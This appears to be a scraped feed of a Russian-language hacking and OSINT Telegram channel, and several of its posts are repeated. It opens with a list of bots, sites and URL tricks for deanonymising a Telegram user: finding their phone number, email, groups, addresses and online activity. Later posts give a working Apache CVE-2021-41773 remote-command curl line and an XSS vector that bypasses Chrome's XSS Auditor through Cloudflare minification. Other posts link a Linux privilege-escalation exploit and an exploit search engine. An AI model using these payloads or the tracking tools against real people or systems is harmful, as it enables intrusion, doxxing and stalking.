Поиск по аккаунту Telegram
🤖Боты
├ Quick OSINT — поддерживает поиск по TelegramID, username и join ссылкам. Найдет телефон, email, как владелец записан в контактах, базах данных и досках объявлений, аккаунты в соц. сетях и мессенджерах, в каких чатах состоит, документы, адреса и многое другое
├ @creationdatebot — примерная дата создания аккаунта, бот принимает username, но не работает поиск по ID
├ @eyeofbeholder_bot — бот подсказывает интересы человека по его аккаунту Telegram, дает бонус каждому новому пользователю, который можно потратить на 1 поиск
├ @get_kontakt_bot — найдет номер телефона аккаунта, бот принимает username и ID
├ @MySeekerBot — поисковик по иранским каналам
├ @SangMataInfo_bot — история изменения имени аккаунта
├ @TeleSINT_Bot — найдет группы в которых состоит пользователь
└ @usinfobot — при поиске по ID найдет username, а так же может показать старое имя аккаунта
⚙ Ресурсы
├ archive.org — покажет архивированную версию аккаунта (только с публичным username), канала или группы
├ chatarchive.xyz — поиск в сообщениях 1000+ групп
├ lyzem.com — поисковик аналогичный buzzim
├ search.buzz.im — поиск в публичных каналах и группах, еще найдет публичные сообщения пользователя
├ telemetr.me — поиск в более 200 млн постах Telegram каналов, чтобы увидеть все посты используйте телефон
└ tgstat.com — поиск в более 1.89 млрд постах Telegram каналов
🔧 Приложения
└ TelegramOnlineSpy — лог онлайн активности аккаунта
🔨 Поиск через URL
├ https://chatarchive.xyz/user/USERNAME — найдет сообщения пользователя и группы в которых они был написаны, замените USERNAME на юзернейм аккаунта если он есть
├ https://etlgr.io/conversations/123456789/subnoscription — найдет сохраненное имя аккаунта и статус подписки на сервис etlgr
└ https://my-medon.aviasales.ru/list?key=tg:123456789 — найдет подписки на авиабилеты, замените 123456789 на ID аккаунта
🤖Боты
├ Quick OSINT — поддерживает поиск по TelegramID, username и join ссылкам. Найдет телефон, email, как владелец записан в контактах, базах данных и досках объявлений, аккаунты в соц. сетях и мессенджерах, в каких чатах состоит, документы, адреса и многое другое
├ @creationdatebot — примерная дата создания аккаунта, бот принимает username, но не работает поиск по ID
├ @eyeofbeholder_bot — бот подсказывает интересы человека по его аккаунту Telegram, дает бонус каждому новому пользователю, который можно потратить на 1 поиск
├ @get_kontakt_bot — найдет номер телефона аккаунта, бот принимает username и ID
├ @MySeekerBot — поисковик по иранским каналам
├ @SangMataInfo_bot — история изменения имени аккаунта
├ @TeleSINT_Bot — найдет группы в которых состоит пользователь
└ @usinfobot — при поиске по ID найдет username, а так же может показать старое имя аккаунта
⚙ Ресурсы
├ archive.org — покажет архивированную версию аккаунта (только с публичным username), канала или группы
├ chatarchive.xyz — поиск в сообщениях 1000+ групп
├ lyzem.com — поисковик аналогичный buzzim
├ search.buzz.im — поиск в публичных каналах и группах, еще найдет публичные сообщения пользователя
├ telemetr.me — поиск в более 200 млн постах Telegram каналов, чтобы увидеть все посты используйте телефон
└ tgstat.com — поиск в более 1.89 млрд постах Telegram каналов
🔧 Приложения
└ TelegramOnlineSpy — лог онлайн активности аккаунта
🔨 Поиск через URL
├ https://chatarchive.xyz/user/USERNAME — найдет сообщения пользователя и группы в которых они был написаны, замените USERNAME на юзернейм аккаунта если он есть
├ https://etlgr.io/conversations/123456789/subnoscription — найдет сохраненное имя аккаунта и статус подписки на сервис etlgr
└ https://my-medon.aviasales.ru/list?key=tg:123456789 — найдет подписки на авиабилеты, замените 123456789 на ID аккаунта
👍1
CVE-2022-23222
Linux LPE. Kernel 5.8 - 5.16 —- Исправленно в версиях 5.10.92 / 5.15.15 / 5.16.1
https://github.com/tr3ee/CVE-2022-23222
#exploit #linux #lpe
Linux LPE. Kernel 5.8 - 5.16 —- Исправленно в версиях 5.10.92 / 5.15.15 / 5.16.1
https://github.com/tr3ee/CVE-2022-23222
#exploit #linux #lpe
Forwarded from Hacker News
Cloudflare отразила рекордную DDoS-атаку мощностью 26 млн запросов в секунду
https://xakep.ru/2022/06/14/26-mln-rps/
https://xakep.ru/2022/06/14/26-mln-rps/
XAKEP
Cloudflare отразила рекордную DDoS-атаку мощностью 26 млн запросов в секунду
Компания Cloudflare сообщила о новой рекордной DDoS-атаке, с которой специалистам удалось справиться на прошлой неделе. В атаке участвовал небольшой, но мощный ботнет, состоящий из 5067 устройств.
Forwarded from Кавычка (crlf)
attacking_bitrix.pdf
3.6 MB
Уязвимости и атаки на CMS Bitrix
1. Особенности
2. Уязвимости
3. Методы атак
Приятного чтения!
1. Особенности
2. Уязвимости
3. Методы атак
Приятного чтения!
Недавняя CVE-2021-41773 в Apache 2.4.49, это не только выход из директории с чтением файлов, как многие подумали
curl --data "A=|echo;id" 'http://127.0.0.1:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'
curl --data "A=|echo;id" 'http://127.0.0.1:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'
Forwarded from Life-Hack - Хакер
Telegraph
Радужная таблица
#Обучение Радужная таблица (англ. rainbow table) — специальный вариант таблиц поиска (англ. lookup table) для обращения криптографических хеш-функций, использующий механизм разумного компромисса между временем поиска по таблице и занимаемой памятью (англ.…
Хороший материал по захвату доменов (поддоменов), когда о них забывают:
https://github.com/EdOverflow/can-i-take-over-xyz
https://github.com/EdOverflow/can-i-take-over-xyz
GitHub
GitHub - EdOverflow/can-i-take-over-xyz: "Can I take over XYZ?" — a list of services and how to claim (sub)domains with dangling…
"Can I take over XYZ?" — a list of services and how to claim (sub)domains with dangling DNS records. - EdOverflow/can-i-take-over-xyz
Быстрый поиск по эксплойтам и полезным программам. Enjoy!
https://sploitus.com
https://sploitus.com
Sploitus
💀 Sploitus | Exploits & Tools Search Engine
Sploitus is a convenient central place for identifying the newest exploits and finding attacks that exploit known vulnerabilities. The search engine is also a good resource for finding security and vulnerability discovery tools.
Не все йогурты одинаково полезны!
Например, настройка в CloudFlare по сжатию страницы ломает Chrome XSS Auditor, что позволяет с легкостью его обойти. Достаточно указать вектор, в котором содержимое атрибутов не будет обрамлено кавычками, Auto Minify CloudFlare все сделает за тебя, а Chrome не увидит, что вектор атаки передался в URL, так как содержимое на странице будет различаться от того, что было передано в запросе.
<noscript/src=//html5sec.org/test.js></noscript>
вжух =>
<noscript src="//html5sec.org/test.js"></noscript>
https://twitter.com/i_bo0om/status/895896778914004993
Например, настройка в CloudFlare по сжатию страницы ломает Chrome XSS Auditor, что позволяет с легкостью его обойти. Достаточно указать вектор, в котором содержимое атрибутов не будет обрамлено кавычками, Auto Minify CloudFlare все сделает за тебя, а Chrome не увидит, что вектор атаки передался в URL, так как содержимое на странице будет различаться от того, что было передано в запросе.
<noscript/src=//html5sec.org/test.js></noscript>
вжух =>
<noscript src="//html5sec.org/test.js"></noscript>
https://twitter.com/i_bo0om/status/895896778914004993